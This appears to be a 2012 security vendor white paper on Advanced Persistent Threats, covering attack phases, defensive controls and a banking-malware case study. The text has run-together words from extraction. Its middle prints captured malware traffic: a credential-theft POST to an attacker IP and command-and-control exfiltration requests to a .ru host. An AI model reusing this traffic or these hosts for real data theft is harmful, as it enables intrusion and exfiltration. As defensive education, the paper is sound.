Z52Svb2rcontent.ie5

1WhitePaperDEFENDINGAGAINSTADVANCEDPERSISTENTTHREATS2DEFENDINGAGAINSTADVANCEDPERSISTENTTHREATSJanuary,2012IntroductionThepublicityassociatedwiththeJanuary2010newsthatGoogleandotherlargeorganizationsinInternet,finance,technology,media,andchemicalsectorshadbeentargetedbyahighlysophisticated,targetedattackhasraisedawarenessofaclassofattacks(andattackers)termedthe"AdvancedPersistentThreat"(APT).
NumerousAPTattackshavebeenpubliclyacknowledgedin2011,includingattacksagainstRSA,LockheedMartin,L-3Communications,andtheInternationalMonetaryFund.
In2006,theU.
S.
AirForcebegantousetheterm"AdvancedPersistentThreat"todescribetheroleofnationstatesinattackingInternetusers.
TheAPTiscomprisedofgroupsofsophisticated,well-fundedattackers,likelystate-sponsored,targetingnotonlyU.
S.
governmentandnationaldefensetargets,butanyorganizationthatmaymaintainortransmitdatathatcouldprovidetheirsponsorswithanytypeofcompetitiveadvantage.
Thewiderangeofindustriestheseattackershavetargetedrepresentsasignificantchallengetomanyorganizationsthathadnotpreviouslybeenawareof,ordefendedagainst,thisclassofattack.
AnAPTis:AdvancedAPTsareintendedtooperatequietly,lookingforhigh-valuedatasuchassoftwaresourcecodeorotherintellectualproperty,overanextendedperiodoftime.
AnAPTcanutilizeawiderangeofattackcapabilities—fromuseofcommontoolstothecreationofsophisticatedcustomexploitsthattargetaparticularorganization.
APTattackstypicallyonlyutilizetheresourcesnecessarytocompromiseatarget.
Ifanorganizationhaspoorsecuritycontrols,apreviouslypublishedexploitmightbeusedagainstawell-knownvulnerability.
However,ifatargetiswell-secured,previouslyunpublicizedzero-dayexploitsmaybeusedtogainaccess.
PersistentOnceanAdvancedPersistentAdversary(APA)hasestablishedaccesstoatargetedenvironment,theattackersuseavarietyoftechniquestoescalateprivileges,aswellastoestablishapermanent,undetectablepresenceintheenvironment.
OnceanAPThasestablishedapresence,itcanbeverydifficulttoremove.
This'persistence'allowstheAPTtomaximizeexploitationofinformationoveranextendedperiod.
APTattacksareintendedtomaintainanextendedpresenceinanenvironment,inordertocontinuallyaccessandextractnewandpotentiallyvaluabledatafromtheenvironment.
ThreatAPTattackstargetorganizationstoachieveaspecificobjective.
APTsoftenfocusonobtainingandextractingfinancial,technological,orotherinformationfromtargetedenvironmentsprovidingtheirsponsorswithacompetitiveadvantage.
APTsutilizehumanabilityandcreativity,andarenotbotsorworms,althoughsimilartoolsmaybeemployedbytheAPTsduringanattack.
Theattacksusedbythe"APT"attackersarenotverydifferentfromthoseusedbyotherintruders.
ThemaindifferentiatoristheAPTattacker'sperseverance,resources,andsenseofpurposetoobtainandextractinformationofvaluefromatargetorganization.
Asatargetimprovesitscapabilitytorespond,APTattackerswillutilizemoresophisticatedtoolsandtechniques.
Asaresult,APTattackscanpresentdifferentchallengescomparedtoothertypesofcomputersecuritybreaches.
3TheAdvancedPersistentAdversaryDuetotheslow,persistentnatureofAPTattackers,somesecurityresearchersrefertothisattacktypeastheAdvancedPersistentAdversary(APA)asopposedtotheAdvancedPersistentThreat.
ThetermAPAalsoputsthefocusontheattacker,notthethreat--thethreatchangesforeachattack,andthekeytoasuccessfulAPTistheskilloftheAPA.
Quiteoften,theexploitsusedbyanAPAarenotparticularlyadvancedorcomplex.
Instead,theAPAcarefullyresearchesthetargetandchoosesexploitsknowntoresultinminimalchancesofdetection,butalsoaccomplishthegoalsoftheattack.
TheAPAisslowandmethodical,usinganarrayoftacticstoexecuteanattack.
Asatargetimprovesitsdefenses,theAPAlikewisechangestacticstocircumventthosedefenseswhileavoidingdetection.
ThismakesdetectingandstoppinganAPAthatmuchmoredifficult.
ThereisnosilverbullettechnologyforthwartinganAPA.
Insteadofrelyingontraditionaldefensesandsignatures,organizationsshouldlookforbehavioralcharacteristicstodetecttheAPTattacks.
SevenPhasesofanAPTAttackTounderstandhowanAPTattackworks,itishelpfultounderstandthelifecycleofsuchanattack,whichtypicallyconsistsofsevenphases.
Eachphaseisdiscussedindetailbelow.
1.
Planning&InfoGatheringAPTattacksoftentargetindividuals,groups,ortechnologiesasamechanismtogaininitialaccesstoanenvironment.
Theywilldirectlyprobeatargetandperformreconnaissancetogatherintelligence.
Whenresearchingspecificpeopletotargetatanorganization,theAPTmayutilizethecompanyWebsite(listofofficers,etc.
),LinkedIn,Facebook,Twitter,publicrecords,andofcoursesearchengines.
Theeducationaltoolpleaserobme.
com,showninthescreenshotbelow,canbeusedtoobtaininformationaboutTwitteruserswhopostlocationupdatestoTwitter.
4PleaseRobMe–TwitterLocationTrackingSiteAPTscanalsoobtaininformationaboutanorganization'sInternetpresenceandtechnologyinfrastructurebyusingtoolssuchasNetcraft,ARIN,andDNSstuff,orviacorporateblogs,techforums,andsocialengineering.
Specifictargetsareidentified(fromadministrativeassistantstoofficersofthecompany)basedontheinformationgatheredduringthisphase.
2.
AttackandCompromise(Breach)TherearenumerouswaysanAPTmaydistributeanattackagainstindividualsandgroupsofusers(e.
g.
,e-mail,forums,socialmediasites,webpages).
Themostcommon,e-mail,typicallyconsistsofamaliciouslinkorattachment(e.
g.
,PDF,Word,URL)asastartingpointtocompromisetheindividual'ssystem.
Manyofthesemaliciouse-mailsarepersonalizedutilizinginformationgatheredduringthefirstphaseoftheattack,toincreasetheoddsthetargetopensthee-mailandattachments–thistechniqueiscalledspearphishing.
Hereisanexampleofaspearphishingemail:53.
EstablishCommandandControlThisphaseistypicallyautomatedandinvolvesgatheringsystem,network,anduserinformationtogaincontrolofacompromisedsystem.
Theattackestablishesacommunicationchanneltooffloadinformationgathered.
Itmayalsoprovideprogramupdatesforthemalwareusedduringtheattack,allowingtheattacktomutate,andincreasethechancesthemaliciouscodeisnotdetectedbycommercialanti-virussoftware.
Thistypeofevasiontechniqueisknownaspolymorphingandisverydifficulttodetectanderadicatesincethemalwareisconstantlyevolving.
MalwareCommandandControlConsoleExample64.
AuthorizationandCredentialTheftThegoalofthisphaseistoobtainuserloginsandpasswordsfortargetsystems,especiallysecurityand/orcriticalsystemdevices.
InternalsystemswhichutilizeadefaultOEMpasswordoraneasilyguessablepasswordareatamuchhigherriskthanthoseimplementingstrongpasswordrequirements.
TheHTMLsnippetbelowwasobtainedfrommalwareidentifiedduringaSolutionaryincidentresponseinvestigation.
Themalwareresidesonthehostsystem,capturesusercredentialssubmittedtowebforms,andforwardsthecapturedcredentialstoaLatvianIPaddresscontrolledbytheattacker:MalwareCredentialTheftExamplePOST/cgi-bin/forms.
cgiHTTP/1.
1Content-Type:multipart/form-data;User-Agent:Mozilla/4.
0(compatible;MSIE8.
0;WindowsNT5.
1;Trident/4.
0;.
NETCLR1.
1.
4322;.
NETCLR2.
0.
50727;.
NETCLR3.
0.
04506.
648;.
NETCLR3.
5.
21022)Host:46.
252.
130.
106Content-Length:286Cache-Control:no-cacheContent-Disposition:form-data;name="upload_file";filename="910043429.
70"Content-Type:application/octet-streamURL:http://10.
10.
10.
1/login/login.
phpusername=Solutionary&password=Solpass5.
ManualExploitationandInformationGatheringDuringthisphase,theAPTutilizesthecompromisedsystemstoimplementandrunadditionaltoolssuchaskeyloggers,decrypters,andnetworksniffers.
Thesetoolsareusedtogatheradditionalcredentials,e-mails,sensitivesystemdata,andadditionalnetworkinformationtoidentifymorepotentialtargets.
Additionally,theAPTbeginssearchingforthesensitiveinformationthatisthetargetandgoaloftheattack.
6.
DataExfiltrationAstheattackspreadsfromtheinitialhostmachinetoothersystemsacrossthenetwork,informationgatheredalongthewayispassedbacktotheattackerviaanexternalserver.
APTdataexfiltrationisoftenperformedinacovertmanner,suchashidingdatainDNSrequests,orinthebodyofencryptedHTTPSrequests.
Moresophisticatedattacksmayusesteganographictechniquestohidestolendatawithinotherfiletypes.
Asmentionedabovemostexfiltrationsareperformedinacovertmanner,butrecentincidentsinvestigatedbySolutionaryhaveidentifiedthatDistributedDenialofService(DDOS)attackshavebeenusedbycriminal-basedattackerstodistractpotentialvictimsofAPTattacksduringexploitation,DataExfiltrationStageorunauthorizedaccess.
Inoneincident,anattackerhadcompromisedavictimnetwork,andattemptedanumberofwiretransfersfromvictimaccounts.
Simultaneously,theattackerlaunchedaDDOSattackagainstthevictim.
TheintentoftheDDOSattackwastoconsumethevictim'sinvestigativeandtechnicalresourcesforaperiodoftimesothatthewiretransferswouldgounnoticed.
TheHTTPcapturesbelowdemonstrateaDataExfiltrationattemptfromacompromisedsystem.
Themalwareinstalledonthesystemfirstattemptstocommunicatebacktoacommandandcontrolsystematlaw-service2011.
rutoidentifyitself(thisistheinitialGETrequest).
Afteridentifyingitself,themalwarethenbeginstosenddatatothelaw-service2011.
rusystem(dataexfiltrationPOSTrequest).
SubmissiontoLatvianIPaddressOriginalrequestwithuserID"Solutionary"andpassword"Solpass"7DataExfiltrationExample***INITIALGETREQUEST***GET/h=NT5.
1.
2600-BAD9DDEA.
ENU.
55274-640-0865063-23775&i=8fpodiqpdoe&o=210631&f=x&si=cjcjjlbobjiidhc&so=1920&tl=21048&v=17&d=NbvGGlnT8Tij4iaL/DmeDlrRHVvlYL4phuKF8VL9Xtg1sU3MaQCH5JZIx0AIXgaySRuSQPOKJuKkQv2xfELmc3g0xppZU/HIo2ImCgi8nng1ERDZCOW9qY6hhoZzT0VrTXtegVFfZ52Svb2r(B4mE3iXnpz7/yV7jaH(….
.
.
.
/XHWbxiAYj4ljylYOF5HqNZ5J5QyI8l4pZSBbFRO9KIUQTGmklE6tiKfigx5auLUXhRJhbl4MaDmZh9h2aDZVg1bWc8XYBvd46btfLS7SYTUo2PwOH8Jnh53OpAWrbIOVWDxzRBxQg5igctgNZinvhGzAWQ80m(E5n0fgBI30XSMcVd4VoShQiWSq1B2p8ouVINnirZgijDkUjlxmkZypJFGdaQZkwFyZp9Ryf70KdoHTTP/1.
1Accept:*/*Accept-Language:en-usUA-CPU:x86Accept-Encoding:gzip,deflateUser-Agent:Mozilla/4.
0(compatible;MSIE7.
0;WindowsNT5.
1;.
NETCLR1.
1.
4322;.
NETCLR2.
0.
50727;.
NETCLR3.
0.
4506.
2152;.
NETCLR3.
5.
30729)Host:law-service2011.
ruConnection:Keep-Alive***DataExfiltrationPOSTRequest***POSTlaw-service2011.
ruHTTP/1.
1User-Agent:Mozilla/4.
1(compatible;MSIE17;NT5.
1.
2600-BAD9DDEA.
ENU.
55274-640-0865063-23775)8v09RpEKjijmJ0BtpEbPeNMAagsJAaWdzwsHsH7NtGopYQyEbXJ2wX27VhBV1i7mQGkrNqu+fG09ySX9CZnmXQ==|00CSA|7.
MaintainPersistenceDuringthisphase,multipleattackvectorsareseededintothecompromisedhostsandlieinwait.
Someoftheseexploitsmaybedecoysortoolsthathavealreadyservedtheirpurpose,whichmaybeidentifiedandremovedwithoutaffectingthemainexploit(s).
Forexample,anorganizationmaytakeanaffectedsystemofflinetoremoveknownthreatsdetectedbyanti-virus.
Oncedetectedthreatshavebeenremediated,thesystemisputbackonline.
Atthistime,theundetectedmalwareresumescommunicationswiththecommandandcontrolinfrastructureforfurtherinstructions.
Onecriticalnote:BasedonSolutionary'sexperience,whenorganizationsidentifyanderadicateabreach,monitoringandnotificationeffortsforbreachesmustimprove.
Therearetworeasonsthatnecessitatethisincreasedvigilance:1.
Ifabreachisdetected,theremaybeadditionalsystemscompromised,usingpotentiallydifferenttechniques,waitingtobeutilizedbytheattacker.
APTsarelikelytocompromisenumeroussystems,butuseonlyoneofthesystemsforaperiod.
Ifthatcompromisedsystemisdetectedandremediated,theAPTwillsimplyutilizeanothercompromisedsystemthathasnotbeendetected,tomaintainpersistence.
2.
Ifanorganizationisthevictimof,orhasdetected,apriorsophisticatedattack,itislikelythereisdataintheorganizationthatisofinteresttotheattackers.
Sinceno8effectivemechanismsexisttoprosecutetheseattackers,thereislittlerisktotheattackerstocontinueintheirattemptstoaccessthatinformation.
WaystoProtectAgainstAPTsAnyorganizationmaybethetargetofanAPTattack.
Evenorganizationsthatmaynotconsiderthemselvesatargetneedtoconsiderthatinformationsuchascustomerdata,partnerdata,employeedata,mergerandacquisitionactivity,andresourcessharedwithotherorganizationsmaybetargetedinanattack.
Additionally,organizationsmustidentifysecurityweaknessesintheirenvironmentthatcouldbeusedasabaseofattackagainstcustomersorbusinesspartnerswhomayhaveinformationofinteresttoAPTactors.
TherearespecificcontrolsSolutionaryrecommendsthatallorganizationsimplementtoprovidebasicprotectionagainstAPTattacks.
OrganizationsbelievingtheyareathigherriskofbeingtargetsofanAPTattackshouldconsidermoregranularcontrols.
OrganizationspreviouslytargetedbyAPTattacksshouldconsiderenhancingdetectiveandpreventativecontrols.
MoreinformationaboutthedifferenttiersofcontrolispresentedinthePotentialDefenseStrategiesAgainsttheAdvancedPersistentThreatdiagramlaterinthiswhitepaper.
Whileeveryorganizationmustmakedecisionsaboutsecuritycontrolstrategiesbasedontheiruniquecircumstances,theintentofthesetiereddefensestrategiesistoprovideorganizationswithgeneralconceptualoutlinesofpotentialactionstoconsider.
Thisguidanceisnotintendedtoreplaceexistinginformationsecurityprogramsandbestpractices,butisintendedtohighlightareasoffocusfororganizationstobetterprotectagainsttheAdvancedPersistentThreat.
Recommendedactionsforthethreethreattiersarepresentedbelow.
AllOrganizationsAssetandDataClassificationandFlow(SANSCSC#1and#2)Allorganizationsmustidentifytheirmostcriticalassets,includingfinancialandintellectualpropertyassets,andensureexistingsecurityprograms,aswellasfuturesecurityinvestments,focusonthemonitoringandprotectionofthoseassets.
SecurityAwarenessTraining(SANSCSC#20)MostAPTattacksincludeasocialengineeringcomponenttogainaninitialfootholdintheenvironment.
Spear-phishing(phishingattackstargetedagainstindividuals)hasbeenusedinnumerouspublicizedAPTattacks.
Traditionalsocialengineeringtechniques,suchasphonecalls,havealsobeenusedinAPTattacks.
ThecommonuseofsocialengineeringinAPTattackshighlightstheimportanceoftrainingcriticalemployees(especiallyexecutives,financialpersonnel,researchteams,andotheremployeeswhohaveaccesstosensitiveorconfidentialdata)torecognizepotentiallysuspiciouse-mailsandsocialengineeringattacks,aswellasproperincidentresponseandnotificationprocedures.
SocialnetworkingsitesareagrowingsourceofpersonalinformationusedbyAPTattackerstogatherintelligencefortargetingtheirvictims.
9Therefore,itisalsoimportantfororganizationstohaveclearpoliciesaddressingaccesstothesesitesusingcorporateresources,aswellaspoliciestoremindemployeesaboutwhattypesofinformationisallowedandnotallowedtobepostedtopublicsocialmediasites.
RegularSecurityTesting(SANSCSC#4,#6,#7)Regularsecuritytesting,includingvulnerabilityassessments,penetrationtests,applicationsecurityassessments,andauditsofpotentiallysensitivetechnologies(suchaswirelessenvironments),shouldbeconductedtoidentifyandremediatepotentialsecurityvulnerabilitiesthatcouldbeexploitedaspartofanAPTattack.
AppropriateUseofCriticalSystems(SANSCSC#12)Usersystemswhichsupportmission-criticalprocesses,ortransmitmission-criticaldata,shouldenforcestricterAppropriateUsestandardsthantypicalusersystems.
Forexample,systemsusedtoperformfinancialtransactionsshouldnotalsobegivenpermissiontoperformgeneralInternetbrowsing.
NOTE:CaseStudy1presentedinthispaperdiscussesaninfectionthatlikelyoriginatedfrompersonaluseofamission-criticaldevice.
SecureCredentialDistributionUsercredentialsshouldnotbedistributedviamechanismsaccessiblebyanattacker,suchasplain-texte-mails,orviainstantmessaging(wheretheinformationmaybekeptinsessionlogs).
NOTE:CaseStudy1presentedlaterinthispaperdiscussesaninfectionwhereanattackerobtainednumerousaccountcredentialsbyreviewingthee-mailhistoryofasystemadministratorwhohadsentcredentialstousersviaplain-texte-mail.
SystemPatchingandHardening(SANSCSC#3and#4)APTattackscangainafootholdinanorganization'senvironmentbyexploitingpreviouslypublishedvulnerabilities.
Toprotectagainstthisthreat,organizationsmustensurealltechnologiesaccessingexternalresourcesareconfiguredaccordingtosecurehardeningstandards(todisablepotentiallyunnecessaryandinsecurefunctionality),andarepatchedtoremediatesecurityvulnerabilitiesonaregularbasis.
NOTE:InnumerousincidentinvestigationsperformedbySolutionary,includingCaseStudies1and2presentedinthisdocument,significantgapsinpatchingexisted,whichwerepotentialmechanismsbywhichAPTattacksgainedafootholdintheenvironment.
Anti-virus/Anti-Spyware(SANSCSC#5)AlthoughhighlysophisticatedAPTattacksmaynotbedetectedbyanti-virussoftware,anti-viruscanstillbeaneffectivetoolagainstlesssophisticatedattacks.
Differentanti-virusproductshavedifferentlevelsofeffectivenessagainstdifferenttypesofattacks.
Therefore,itisadvisable,wherepossible,toimplementanti-virusprotectionfrommultiplevendorsinenterpriseenvironments.
Theseprotectionsshouldbeimplementedattheend-userdesktopandatvariousingressandegresspointswithinthenetwork.
Layereddefenses,suchasdesktopanti-virus,mailgatewayanti-virus,andprotocolawareproxiescansignificantlyreducethelikelihoodofsuccessfulattacks.
10NOTE:CaseStudy3ofthisreportdemonstratestheeffectivenessofdifferentanti-virusvendorsagainstacompromisedcustomerdevice.
IncidentResponseCapabilities(SANSCSC#18)Organizationsmustimplementaneffectiveincidentresponseprogram.
Thisincludestheidentificationandcreationofanincidentresponseteamintheorganization'sincidentresponsepolicies,andperformingregularteststoensuretheteamiseffectiveinfulfillingitsmission.
Thisincludesregulartrainingoftechnicalpersonnel,dryrunsofresponsescenarios,reviewsofanddocumentation/feedbackofexistingincidentsinthecorporateenvironment.
NOTE:InalmostallincidentresponseinvestigationsperformedbySolutionary,poorincidentresponseproceduresresultedinineffectiveresponse.
Asaresult,incidentsthatshouldhavebeencontainedormitigatedwereallowedtopersistinenvironments,increasingthechancesofsignificantdamagebeinginflictedontheenvironmentandexposuretogreaterfinanciallosspotentialfortheorganization.
UserAccountandPrivilegeAuditing(SANSCSC#12,#15)Allorganizationsshouldperformregularreviewsofuseraccountsandaccountpermissions,toensurethatanyunnecessaryorunusedaccountsaredisabledordeleted,andthatallaccountshaveonlythepermissionsrequiredtofulfilltheiroperationalfunction.
LogMonitoring(SANSCSC#14)EnsuredetailedsecuritylogsaregeneratedfromallcriticalandInternet-facingsystemsandlogsarereviewedregularlytoidentifypotentialsecurityeventsandanomalousactivity.
NOTE:InCaseStudy1presentedinthispaper,aninitialinfectionwasidentifiedbyanti-virus.
However,sincetheanti-viruslogswerenotmonitoredorreviewed,andmaliciousactivityblockingwasnotenabled,theinfectionwasnotnoticeduntil20daysaftertheinitialinfection.
11PossibleAPTTargetsInadditiontothecontrolsidentifiedforAllOrganizations,thefollowingcontrolsshouldbeconsideredbyorganizationswhichmaintaininformationthatcouldpotentiallybetargetedinanAPTattack.
DataLossPrevention(SANSCSC#17)Implementadatalosspreventionsolutiontomonitor,detect,andpreventtheunauthorizeduseortransmissionofcriticalorganizationaldata.
SecurityIntelligenceServiceAsubscriptiontoasecurityintelligenceservicecanassistorganizationsinidentificationofnecessarycriticalpatches,aswellasanunderstandingofcurrentzero-dayattacksandotherglobalsecurityeventsandtrendsthatmayaffecttheorganization.
AdvancedDetectionandResponseTraining(SANSCSC#9)Advancedsecurityevent,networktraffic,communicationflowdetection(Command&Control,EggDownload,Spawning,DNSprobes,etc.
),andincidentresponsetrainingshouldbeprovidedforkeyinformationsecurityandincidentresponsepersonnel.
SegmentationofKeyAssets(SANSCSC#13)Implementationofnetworkisolationandsegmentationofkeynetworkassetsandsystemsthatdirectlyaccesskeyassetsanddata(suchascustomerservicerepresentativeworkstations).
Asanexample,CSRworkstationsthatcanaccesscustomerdatashouldbeonaseparatenetworksegmentfromthegeneraluserpopulation,andshouldhavehighlyrestrictedoutboundInternetaccess.
SensitiveUserAuditing(SANSCSC#16)APTattacksoftenusecompromisedaccountstoaccesssensitivedata.
Detailedauditingandmonitoringofsensitiveaccountactivitycanassistorganizationsinidentificationofsuspiciousorunauthorizedactivity.
NOTE:CaseStudies1and4presentedinthispaperdescribeincidentswhereattackersconductedfraudulentactivityusingvaliduseraccounts,aswellasaccountstheattackershadcreatedspecificallytoperformfraudulentactivity.
Auditingandmonitoringofthesecriticalaccountsandfraudulenttransactionsmighthaveallowedtheattackstobedetectedmuchearlier.
NetworkAnomalyDetection(SANSCSC#14)Beyondidentificationofknownsecurityalertsandsignatures,organizationsshouldperformnetworktrafficandprotocoltrending.
Deviationsfromestablishedbaselinescouldbeindicativeofmaliciousactivity.
GranularOutboundFirewallRules(EgressFiltering)(SANSCSC#11,#13,#19)Withoutexception,APTattacksattempttocallbacktotheiroperators,eithertoreceivecommandandcontrolinstructions,ortoexportcriticaldata.
Restrictionsonoutboundfirewallaccessforallsystemscanlimitthepotentialsuccessofthiscommunication.
12KnownAPTTargetsInadditiontothecontrolslistedaboveforAllOrganizationsandPossibleAPTTargets,thefollowingcontrolsshouldbeconsideredbyorganizationsmaintaininginformationknowntobevaluabletoAPT,orwhichhavepreviouslybeentargetedbyAPT.
AdvancedMalwareAnalysisTraining(SANSCSC#9)SophisticatedAPTattacksoftenutilizecustomizedmalware.
OrganizationsthatareknownAPTtargetsshouldemploypersonnel(orretainconsultants)withdetailedmalwareanalysisandreverseengineeringskillsetstoquicklyanalyzesuspicioustrafficorfilesidentifiedintheenvironment,aswellastoprovidesupporttoforensicsinvestigations.
DataDestructionandCleanupImplementprogrammaticcontrolstoensurethatoutdatedandunnecessarydataisremovedfromserversandworkstations,tolimitpotentiallossesintheeventofacompromise.
NOTE:Casestudies1and2presentedinthispaperdescribeincidentswhereoutdateddataresidedoncompromisedsystems.
Thisdatawasunnecessarilyexposedaspartofthecompromise.
AnomalousTransactionMonitoring(SANSCSC#14)Forapplicationsthatperformhighlysensitivetransactions(suchasfinancialtransfers),identificationandreviewofanomaloustransactionsshouldbeperformedtoensuretheactivityisvalid.
NOTE:CaseStudies1and4presentedinthispaperdescribeincidentswhereattackersconductedfraudulentactivityusingvaliduseraccounts,aswellasaccountstheattackershadcreatedspecificallytoperformfraudulentactivity.
Auditingandmonitoringofthesecriticalaccountsandfraudulenttransactionsmayhaveallowedtheattackstobedetectedmuchearlier.
DetailedPacketInspection(SANSCSC#14)Wherepossible,trafficfromcriticalsystemsshouldbecapturedandanalyzedtodetectpotentialmalicioustraffic.
OutboundTrafficMonitoring(SANSCSC#14)Withoutexception,APTattacksattempttocallbacktotheiroperators,eithertoreceiveinstructions,ortoexportcriticaldata.
MonitoringandanalyzingoutboundtrafficpatternscouldalertanorganizationtoapotentialAPTintrusion.
DDoSDefenseMeasuresEvaluateareasofweaknesstoDDoSattackswhichcouldpotentiallyimpactlogging,alerting,communication,andotherbusinessfunctions,alongwithpotentialwaystodefendorprotectinfrastructurecomponentsfromdisruptions.
Mostimportantly,validatethattheincidentresponseplanaccommodatesDDoSconditions.
Seeblogpost:http://blog.
solutionary.
com/blog/Tag=DDoS13ConclusionandRecommendationsTheAPTthreatincludestechniquesthataremoredifficulttodetectbecausetheadversary,whenfacedwithanaboveaveragedefense,doesnotmoveontoaweakertarget.
Theadversaryispersistentandwillescalatetactics.
TheAPT'sfocusisonstealingintellectualpropertyratherthanmoneytoadvancetheadversary'sstrategictechnical,economic,political,andmilitarygoals.
Patienceandresiliencearewhatmaketheseattackssosuccessful.
Organizationsmustbevigilantagainstawidevarietyofsophisticatedandunsophisticatedthreatsexecutedbytechnicalandnontechnicalhackers.
Almostdaily,newsreportsofnewattacksorsecuritybreachesofanenterprisesystemornetworkarepublicized.
Thetopicofnetworksecurityiscontinuouslyinthebusinessheadlinesand,increasingly,discussedinboardrooms.
AnindependentriskassessmentisoneofthemostimportantstepsanorganizationcantaketoprotectthemselvesagainstAPTsandotherthreats.
Organizationsshouldidentifyriskstoinformationtechnologysystemsandassets.
Thiswillhelpprioritizeprotectionforthemost"at-risk"systems.
Itwillalsoallowmanagementtoranktheorderofremediationplansandeffortsandaligntheseeffortstoavailableresources.
Anenterpriseriskassessmentcancapturethescopeofpotentialrisks,andisthefirststepinreducinganorganization'soverallriskinthemosteffectiveandefficientmanner.
Themostat-risksystemsandhighestliabilityassetsthatholdthemostcriticaldatawillthenbecategorizedand(onceresourcesareidentifiedtoremedytheserisks)theoverallrisktotheorganizationwillbeloweredinthemostexpeditiousmanner.
Organizationalriskassessmentmustbeanon-goingprocess,continuallyupdatedtoaccountfornewthreats,aswellasorganizationalchanges(adoptionofnewtechnologies,integrationwithnewpartners,mergersandacquisitions).
Ariskassessmentperformedtodaycanbeanoutdatedartifacttomorrow.
Facedwiththesechallengesandrealities,anenterpriseshouldapplyduediligencetoevaluateallitsoptions.
OneofthoseoptionsisarelationshipwithacredibleManagedSecurityServicesProvider(MSSP).
Consideringadvancingsecuritythreats,andwhatinadequatesecuritycancost,thetimemayberighttoevaluateMSSPs.
Solutionary'sActiveGuardplatformisanidealtoolforidentifyingandevaluatingAPTthreats.
Solutionarymonitorsclients-24x7x365.
Seeingnewthreatsastheyarise,Solutionary'sexpertsrecognizeallthevariouswaysattackscanbeperpetrated.
Solutionaryhastheabilitytoseelow-and-slowattacks,hasthedigitalforensicsknowledgetodissectcomplexandadvancedattackscenarios,andanalyzesattacksacrossalargebaseofcustomers.
Solutionarycanquicklyidentifyemergingtrends,patterns,andanomaliesduetothelargevolumeofinformationwecontinuallyanalyzefromavarietyoforganizationsglobally.
EffectiveuseofallthisintelligenceallowsSolutionarytoprovideglobalcustomerprotectionbasedonidentifiedthreatsorattacksagainstindividualcustomers.
ActiveGuardanalyzeslogfeedsfromalmostanysource,includingapplications,databases,servers,andendpointsystems.
Attacksevadinganti-virusorIntrusionDetectionSystems(IDS)maystillleaveafingerprintinfirewallorsystemlogs,orcreatetrafficpatternsintheenvironmentidentifiedbyanomalydetection.
Inaddition,malicioushostidentificationanddetectioncapabilitiesgiveSolutionarytheabilitytodetectthreatsbaseduponwhoandwhereanattackiscomingfrom.
14PotentialDefenseStrategiesfortheAdvancedPersistentThreatThereisnomagicbullettocombatsophisticated,motivated,APAswithsignificantresources.
Defendingagainstthesethreatsrequiresastrategicapproachacrossallsecuritydomains.
ThisdiagramidentifiesdifferentapproachesfororganizationswithdifferentlevelsofrisktoAPT.
15APTCaseStudiesSolutionarySecurityConsultingServices(SCS)andtheSolutionaryEngineeringResearchTeam(SERT)provideincidentresponseservicestoassistorganizationsintheinvestigationofpotentialAPTattacks,aswellasothermalwareinfectionsandsecurityincidentsintheirenvironments.
OverviewsoffourrecentincidentresponseinvestigationsperformedbySolutionaryarepresentedinthefollowingsections–eachoftheseinvestigationshaskeycharacteristicsthatrelatespecificallytothecontrolstrategiesdiscussedinthispaper.
Theintentofthesecasestudiesisnottoprovideadetailedwalkthroughofeverystepoftheincidentresponseprocessforeach,buttohighlightkeyaspectsofeachinvestigationthatmaybeofinteresttoalargeraudience.
OnetakeawayfromallofthesecasestudiesisthatmultipleformsofeffectivedetectionarerequiredtodefendorganizationsagainstAPTandothersophisticatedmalwareattacks,andthatrelianceonanti-virusproductstodefendanorganizationagainstattacksisnotafeasiblestrategyincurrentnetworkenvironments.
Anotherkeypointisthatsophisticatedattacksarenotimpossibletodetectordefendagainst.
Inthecasestudiespresentedbelow,implementationofcommonsecuritycontrols,orimprovedmonitoringofexistingcontrols,couldhaveallowedthecustomertodetecttheattackmuchearlier,orpotentiallystoppedtheattackentirely.
16CaseStudy1–Zero-DayAttackAgainstBankingApplicationIntroductionThiscasestudyinvolvestheinvestigationofanincidentthatoccurredonthenetworkofanationalnon-profitorganizationinitiatedbyazero-dayTrojaninfectionintheenvironment.
Thiscasestudyoffersanimportantreminderfororganizationstoeffectivelyutilizetechnologiesalreadyinplaceintheirenvironment.
Thisattackcompletelyevadedthecorporateintrusiondetectionsystem.
ManyTrojan/Virus-basedinfectionsaretransmittedandpropagatedvialegitimatetraffic,suchasemailormaliciouswebsites.
StandardIDSsignaturesdonotidentifythistypeofactivity,andoutboundmalicioustrafficdidnottriggeranalert.
However,activitiesassociatedwiththisattackwereidentifiedbynumeroustechnologiesinthecustomerenvironment,butthepoorconfigurationandlackofmonitoringofthesetechnologiesallowedtheattacktogoundetected.
IncidentTimeline–CaseStudy1DateEventDay1McAfeeePolicyOrchestratoridentifiesinfectionactivityonauserPCinthecustomerenvironment.
However,thisactivitywasnotreportedtotheenterprisemanagementconsole,andwasnotblockedbytheanti-virusapplicationthatdetectedit(whichwasnotmonitoredfull-timeorinanactiveblockingmode).
Day19Host-basedIPSdetectshundredsofcriticalevents.
Thisactivitywasnotreportedtotheenterpriseconsole,notblockedbytheIPS,andnotmonitoredinanyway.
Day20Websensecontentfilteringsoftwareidentifieshundredsofrequestsina60-secondspantoamaliciouscommandandcontrolsite.
Day21Customer'spartnerbankcontactscustomerregardingimproperwiretransfersbeingsubmittedfromcustomernetwork.
Day22CustomeridentifiesPCsandusersidentifiedwithanomaloustransactions,andremovessystemsfromthenetwork.
Day22CustomeralertstheFederalBureauofInvestigations(FBI)andSolutionary.
Day27Solutionaryimplementscustommonitoringincustomernetwork–60additionalinfectedhostsareidentifiedintheenvironment.
Day27-37Solutionaryidentifiesmalwareevidenceonsystems,aswellasaccesstonumeroussystemsbymultiplehackinggroups.
IncidentAnalysisTheunfortunateaspectofthisincidentisthatitcouldhavebeenavoided,oratleastidentifiedmuchsooner,byeffectiveconfigurationandmonitoringoftechnologiesalreadyinplaceintheenvironment.
Thefollowingpointshighlighttechnologiesinplaceinthecustomerenvironmentthatdetectedthemaliciousactivity,butwerenotadequatelymonitoredbythecustomer:Anti-virusConfigurationandMonitoring–Whiletheinfectedsystemhadanti-virusmonitoringinplacethatdetectedwhatwaslikelytheinitialinfection,theanti-virusdidnotblockthemaliciousactivity,andnomonitoringofthesystemwasinplace,sotheactivitywentcompletelyundetecteduntilthecustomerwasnotifiedoftheimproperwiretransfersfromtheirbankpartner.
LogMonitoring-Host-BasedIPSMonitoring–Thehost-basedIPSrunningontheinfectedsystemwasnotconfiguredtoreportalertstotheenterprisesecurityconsole,norwasitconfiguredtoblock17potentiallymaliciousactivity.
